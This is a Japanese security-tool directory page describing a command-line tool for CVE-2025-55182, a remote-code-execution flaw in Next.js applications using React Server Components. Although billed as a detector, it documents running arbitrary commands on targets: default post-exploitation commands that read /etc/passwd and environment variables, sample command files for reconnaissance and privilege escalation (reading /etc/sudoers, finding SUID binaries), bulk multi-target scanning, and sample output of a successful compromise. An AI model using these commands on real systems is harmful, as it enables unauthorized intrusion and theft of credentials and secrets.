Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182 — React Server Componentsを使用するNext.jsアプリケーションにおけるCVE-2025-55182およびCVE-2025-66478を検出するためのコマンドラインツール。 | Kitploit
ツール/GitHubGitHub/rix4uni/cve-2025-55182
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテストコマンド&コントロール
GitHubrix4uni/cve-2025-55182

CVE-2025-55182

React Server Componentsを使用するNext.jsアプリケーションにおけるCVE-2025-55182およびCVE-2025-66478を検出するためのコマンドラインツール。

リポジトリを見る
613ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182

React Server Componentsを使用するNext.jsアプリケーションにおけるCVE-2025-55182およびCVE-2025-66478を検出するためのコマンドラインツール。

🚀 インストール

root@kitploit:~
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator

🛠️ 使い方

CVE-2025-55182 スキャナー

基本構文

root@kitploit:~
CVE-2025-55182 -d https://example.com

オプション

オプション説明デフォルト
-d, --domainターゲットURL(プロトコルがない場合は自動でhttps://を付加)http://localhost:3000
-c, --command実行する単一コマンド-
-m, --multipleセミコロンで区切った複数コマンド-
-f, --fileコマンドを1行ずつ記述したファイル-
-h, --helpヘルプメッセージを表示-

注: コマンドオプションが指定されていない場合は、デフォルトのコマンドが実行されます。

デフォルトコマンド

ツールはデフォルトで以下のコマンドを実行します:

  1. cat /etc/os-release - OS情報
  2. whoami - 現在のユーザー
  3. pwd - 現在の作業ディレクトリ
  4. id - ユーザーIDとグループ
  5. uname -a - システム情報
  6. hostname -I - ネットワークインターフェース
  7. ls -la - ディレクトリ一覧
  8. cat /etc/passwd - ユーザーアカウント
  9. env - 環境変数
  10. ps aux - 実行中プロセス

レポートジェネレーター

reportgenerator ツールは、スキャン結果から専門的な脆弱性開示レポートを自動生成します。

機能

  • 複数ターゲットの並列スキャン
  • 既存のレポートを保持する自動採番(上書きなし)
  • プロフェッショナルなMarkdownレポート(Security Vulnerability Disclosureセクション付き)
  • カスタマイズ可能な研究者名および入力ファイル

基本的な使い方

root@kitploit:~
# Create a file with target domains
echo -e "https://target1.com\nhttps://target2.com" > subs.txt

# Run report generator
reportgenerator

オプション

フラグ説明デフォルト
--fileターゲットドメインを含む入力ファイルsubs.txt
--user開示セクションの研究者名Bhagirath Saxena

例

root@kitploit:~
# Use default settings (subs.txt, Bhagirath Saxena)
reportgenerator

# Use custom target file
reportgenerator --file targets.txt

# Use custom researcher name
reportgenerator --user "John Doe"

# Use both custom options
reportgenerator --file my-targets.txt --user "Jane Smith"

出力構造

レポートは2つのディレクトリに生成されます:

  • textfile/ - 生スキャン出力(採番: 1.txt, 2.txt など)
  • mdfile/ - プロフェッショナルなMarkdownレポート(採番: 1.md, 2.md など)

注: 自動採番機能により、既存のレポートが上書きされることはありません。新しいスキャンは、既存の最大番号から続けて採番されます。

レポート形式

各生成レポートには以下が含まれます:

  1. Security Vulnerability Disclosure - プロフェッショナルな紹介文
  2. Target - テストしたドメイン
  3. Commands Executed - テスト中に実行したコマンドの一覧
  4. Vulnerability Summary - CVEの詳細と影響評価
  5. Exploitation Details - 実行ステータスを含むコマンド出力
  6. Execution Summary - 各コマンドの成功/失敗を示す表
  7. Impact Analysis - 重大度評価と観察結果
  8. Recommendations - セキュリティチーム向けの修復手順
  9. References - CVE詳細およびセキュリティアドバイザリへのリンク

🎨 出力例

成功したエクスプロイト

root@kitploit:~
▼ 🎯 TARGET: https://vulnerable-app.com
▼ 📋 COMMANDS TO RUN: 10
  • cat /etc/os-release
  • whoami
  • pwd
  • id
  • uname -a
  • hostname -I
  • ls -la
  • cat /etc/passwd
  • env
  • ps aux

[1/10] Executing: cat /etc/os-release
▼ 💻 OS INFORMATION
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...

[2/10] Executing: whoami
▼ 👤 CURRENT USER
║ www-data
...

[3/10] Executing: pwd
▼ 📂 CURRENT DIRECTORY
║ /var/www/html
...

部分的な成功

root@kitploit:~
[6/10] Executing: hostname -I
╔════════════════════════════════════════════════════════════╗
║ Command failed: hostname -I
║ This command might not be available or the server rejected it
╚════════════════════════════════════════════════════════════╝

[!] Trying alternative network command...
▼ 🌐 NETWORK INTERFACES (alternative)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║     inet 127.0.0.1/8 scope host lo
║        valid_lft forever preferred_lft forever
...

🔧 技術詳細

脆弱性

  • CVE: CVE-2025-55182
  • タイプ: プロトタイプ汚染 → RCE
  • 影響対象: 特定の構成のNext.jsアプリケーション
  • ベクター: 細工されたmultipart/form-dataを含むHTTP POST
  • 影響: 認証なしのリモートコード実行(アプリケーションユーザーとして)

📚 参考文献

  • CVE-2025-55182 詳細
  • Next.js セキュリティアドバイザリ

commands/ ディレクトリの例:

さまざまなシナリオ向けのサンプルコマンドファイルを作成:

root@kitploit:~
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
root@kitploit:~
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
root@kitploit:~
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
ツールをダウンロード